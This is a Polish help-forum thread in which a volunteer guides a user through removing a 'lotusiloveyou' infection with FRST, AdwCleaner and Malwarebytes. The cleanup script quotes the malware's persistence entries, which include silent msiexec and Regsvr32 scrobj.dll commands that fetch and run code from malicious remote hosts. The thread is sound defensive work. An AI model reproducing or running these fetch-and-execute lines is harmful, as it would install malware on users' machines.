grisz218 Opublikowano 26 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Witam,To mój pierwszy post na tym forum. Od kilku dni mam problem - avast ciągle wyświetla monity o malware "llotusiloveyou". Z monitu wynika, że jest on związany z procesem Regserv32. Skanowanie nic nie daje, nie usuwa niczego. Zgodnie z informacją na forum przeskanowałem komputer za pomocą FRST i GMER-a, AdwCleanera gmera nie mogę załączyć bo wyskakuje ze nie mam uprawnień ale jak będzie potrzebne to podam jakoś proszę o pomoc pozdrawiam Addition.txt AdwCleanerS0.txt FRST.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 26 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 System jest zainfekowany tą wyjątkową sławną infekcją w ostatnim czasie, oprócz tego dochodzi jeszcze wątpliwy skaner, fałszywa przeglądarka podszywająca się pod Google Chrome i ogólny nieład. 1. Przez panel sterowania odinstaluj: Wątpliwe skanery / oprogramowanie: YAC(Yet Another Cleaner!). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== /q CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?publisher=OC&dpid=OC&co=PL&userid=fcbbdada-8d0f-4e30-81d6-78bc5b3f5fb7&affid=113129&searchtype=hp&babsrc=lnkry","hxxp://www.interia.pl/#utm_source=instalki1&utm_medium=installer&utm_campaign=instalki1&iwa_source=installer_instalki","hxxp://www.omniboxes.com/?type=hp&ts=1453675607&z=ba7d726f9838c2429ec3b41gaz6w9cfq2m5wbq7efm&from=amt&uid=wdcxwd10jpcx-24ue4t0_wd-wxm1e83vhj92vhj92" HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Boxbob RemoveDirectory: C:\Users\Arczi\AppData\Local\Boxbob R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Arczi\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Arczi\AppData\Local\Firefox R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [brak podpisu cyfrowego] U3 kxldrpob; \??\C:\Users\Arczi\AppData\Local\Temp\kxldrpob.sys [X] HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) Task: {39AB3992-685C-4C43-BF2B-267874318720} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== scrobj.dll Task: {BCA1E17D-E930-47CC-A8D9-AF0F275A907B} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{28F4CBD1-61EB-4D72-B858-FD0972534239}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe FirewallRules: [{C5F00FDE-B5CF-49D8-8B76-81C27025C315}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{F6C7D29A-DFC8-45CD-8919-1056F46D94F2}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Arczi\AppData\Local\Mozilla C:\Users\Arczi\AppData\Roaming\Mozilla C:\Users\Arczi\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 4. Pomimo wszczęsniejszych akcji z AdwaCleaner: pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). boxbob;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
grisz218 Opublikowano 27 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 Wszystkie zalecenia wykonałem załączam pliki. AdwCleanerC0.txt Addition.txt Fixlog.txt FRST.txt SearchReg.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 27 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 Do kasacji szczątkowe klucze od fałszywej przeglądarki. Przeprowadzimy końcowy skan, podsumujemy wyniki i będziemy kończyć. 1. Start narzędzia komend. Kliknij jednocześnie klawisz oraz R. Uruchomi się narzędzie Uruchamianie. W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER. Uruchomi się okno konsoli komend. 2. Użycie odpowiednich komend. W oknie konsoli komend wklej poniższą komendę. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Boxbob" /freg delete "HKEY_USERS\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Boxbob" /freg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Firefox" /freg delete "HKEY_USERS\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Firefox" /f Rozpocznie się kasacji kluczy, czekaj, a gdy proces dobiegnie końca uruchom ponownie system. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Podsumuj obecny stan systemu. Odnośnik do komentarza
grisz218 Opublikowano 27 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 27 Kwietnia 2017 wstawiłem komendę usuwanie powiodło się wstawiam raport ze skanu coś tam wykryło system działa dobrze nie wyskakuje powiadomienia o lotusiloveyou w przeglądarce nie otwierają się jakieś dziwne strony reklamy wszystko idzie w dobra stronęmawarebytes.txt Odnośnik do komentarza
Miszel03 Opublikowano 28 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 28 Kwietnia 2017 Wszystkie detekcja daj do usuwania. Następnie zmień hasła we wszystkich serwisach logowania, a szczególnie w banku. Martwą mnie te detekcje: Trojan.WisdomEyes / Trojan.Downloader.D.Generic, ale zakładam, że MBAM usunął je pomyślnie. Kończymy, ale proszę na bieżąco obserwować system. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows. Uaktualni również bazy oprogramowania zabezpieczającego i wykonaj nim pełne skanowanie systemu (raczej już nic nie powinno być wykryte). Odnośnik do komentarza
grisz218 Opublikowano 28 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 28 Kwietnia 2017 wszystko osunięto pomyślnie zastosował delfix sprawdziłem aktualizacje pozmieniałem hasła pousuwałem punkty przywracania przeskanowałem nic nie wykryto dziękuje bardzo za pomoc można zamykać temat pozdrawiam Odnośnik do komentarza
Miszel03 Opublikowano 28 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 28 Kwietnia 2017 OK. P.S: Ja raczej nie mam zwyczaju zamykania tematu. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się